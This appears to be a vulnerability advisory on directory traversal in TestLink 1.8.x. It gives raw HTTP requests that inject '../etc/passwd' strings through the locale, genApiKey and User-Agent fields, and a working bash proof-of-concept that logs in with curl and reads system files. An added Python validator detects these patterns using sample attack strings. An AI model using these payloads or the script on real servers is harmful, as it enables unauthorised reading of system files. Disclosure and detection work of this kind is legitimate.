a) Directory traversal: The POST variable locale has been set to ../../../../../../../../etc/passwd%00.html.
-----------------------------------------------------------------------------------------------------------
Request

POST /testlink/lib/usermanagement/userInfo.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 10.209.84.1
Content-Length: 153
Cookie: PHPSESSID=ad966ffbe53232c258f231404cef4552;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cache

id=1&firstName=Testlink&lastName=Administrator&emailAddress=111-222-1933email@address.tst&locale=../../../../../../../../etc/passwd%00.html&editUser=Save

Response
-----------------------------------------------------------------------------------------------------------------------------------

b) Directory traversal: The POST variable genApiKey has been set to ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
------------------------------------------------------------------------------------------------------------------------------------
Request

POST /testlink/lib/usermanagement/userInfo.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 10.209.84.1
Content-Length: 81
Cookie: PHPSESSID=ad966ffbe53232c258f231404cef4552;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cache

id=1&genApiKey=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

One of the issues in Testlink 1.8.4 can be exploited by directory traversal through the HTTP User-Agent header, as shown below.
-----------------------------------------------------------------------------------------------------------------------------------

c) Directory traversal: The HTTP header User-Agent has been set to ../../../../../../../../etc/passwd .htm.
------------------------------------------------------------------------------------------------------------------------------------
Request

GET /testlink/lib/usermanagement/userInfo.php HTTP/1.0
Accept: */*
User-Agent: ../../../../../../../../etc/passwd .htm
Host: 10.209.84.1
Cookie: PHPSESSID=ad966ffbe53232c258f231404cef4552;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cache

Response

5. Proof of Concept
================

#!/usr/bin/env bash
# Prashant Khandelwal [clickprashant@gmail.com]
# Remote Directory Traversal in Testlink the Test Management Tool
# Vendor : Testlink http://www.teamst.org
# Affected Version : <=1.8.5 (http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc)
# Vulnerability Discovered: 5-Jan-2010
# This POC is for Educational purpose & has only been tested with testlink 1.8.5

if [ $# -ne 4 ]
then
    echo "Usage - $0 User password Testlink_root_dir_URI Directory_traversal_string"
    echo "Example - $0 admin admin http://Testlink-Server/testlink ../../../../../../../../etc/passwd%00.html"
    exit 1
fi

# Start from a clean cookie jar and output file
rm -f cookies output.txt

# Log in and save the session cookie
curl -d "tl_login=$1&tl_password=$2" "$3/login.php" -c cookies

# Submit the user-edit form with the supplied string in the locale field;
# the response body goes to output.txt (curl's -v diagnostics go to stderr)
curl -d "id=1&firstName=Directorytraversal&lastName=Exploit&emailAddress=111-222-1933email%40address%2Etst&locale=$4&editUser=admin" "$3/lib/usermanagement/userInfo.php" -b cookies -v > output.txt

head -n 80 output.txt
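The three request variants above share one defect: a user-controlled value (the locale and genApiKey POST fields, and the User-Agent header) reaches a filesystem path without being validated. The following Python routine is an added example, not TestLink's code or the advisory author's, showing how a defender would check such requests: it percent-decodes repeatedly (so double-encoded sequences cannot slip through), flags "../" or "..\" sequences and embedded null bytes, and additionally requires locale to match an allowlist. The allowlist contents, the parameter names checked and the constructed sample requests are assumptions for illustration; the same logic can be run over captured form bodies from a web access log or applied as server-side input validation.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, unquote

# Constructed allowlist of locale codes for the example; a real deployment
# would take this from the application's configured locale list.
ALLOWED_LOCALES = {"en_GB", "en_US", "de_DE", "fr_FR"}

# Parameter names the advisory identifies as reaching a file path (assumption:
# extend this list to any other parameter the application turns into a path).
PATH_PARAMETERS = ("locale", "genApiKey")

# "../" or "..\" in any position, or a raw NUL byte (used to truncate a path
# once the application appends its own extension such as ".html")
TRAVERSAL_RE = re.compile(r"\.\.[\\/]|\x00")


def normalize(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so that
    double-encoded sequences like %252e%252e%2f are seen as '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def looks_like_traversal(value: str) -> bool:
    """True if the decoded value carries a path-traversal or NUL pattern."""
    return TRAVERSAL_RE.search(normalize(value)) is not None


def locale_is_valid(value: str) -> bool:
    """Positive validation: the locale must be one of the known codes."""
    return normalize(value) in ALLOWED_LOCALES


def audit_request(body: str, user_agent: str) -> List[str]:
    """Return a list of findings for one form submission plus its User-Agent.
    An empty list means nothing suspicious was found."""
    findings: List[str] = []
    params: Dict[str, List[str]] = parse_qs(body, keep_blank_values=True)
    for name in PATH_PARAMETERS:
        for val in params.get(name, []):
            if looks_like_traversal(val):
                findings.append(f"{name}: traversal pattern")
    if "locale" in params and not all(locale_is_valid(v) for v in params["locale"]):
        findings.append("locale: not in allowlist")
    if looks_like_traversal(user_agent):
        findings.append("User-Agent: traversal pattern")
    return findings


# Constructed sample requests (body, User-Agent) modelled on the advisory's
# three variants plus one benign and one double-encoded case.
SAMPLE_REQUESTS: List[Tuple[str, str]] = [
    ("id=1&locale=en_GB&editUser=Save", "Mozilla/4.0 (compatible)"),
    ("id=1&locale=../../../../../../../../etc/passwd%00.html&editUser=Save", "Mozilla/4.0 (compatible)"),
    ("id=1&genApiKey=../..//../..//../..//etc/passwd", "Mozilla/4.0 (compatible)"),
    ("id=1", "../../../../../../../../etc/passwd .htm"),
    ("id=1&locale=%252e%252e%2fetc%2fpasswd&editUser=Save", "Mozilla/4.0 (compatible)"),
]


def audit_samples() -> List[List[str]]:
    """Audit every constructed sample and return the findings per request."""
    return [audit_request(body, ua) for body, ua in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for (body, ua), findings in zip(SAMPLE_REQUESTS, audit_samples()):
        status = "; ".join(findings) if findings else "clean"
        print(f"{body!r} UA={ua!r} -> {status}")
```

The decode loop is bounded on purpose: an unbounded "decode until stable" loop is itself a denial-of-service vector on pathological input, and three rounds already cover the double- and triple-encoding seen in practice. Positive validation of locale against an allowlist is the fix that actually closes the hole; the pattern check is what a log review or WAF rule would use to spot attempts against an unpatched install.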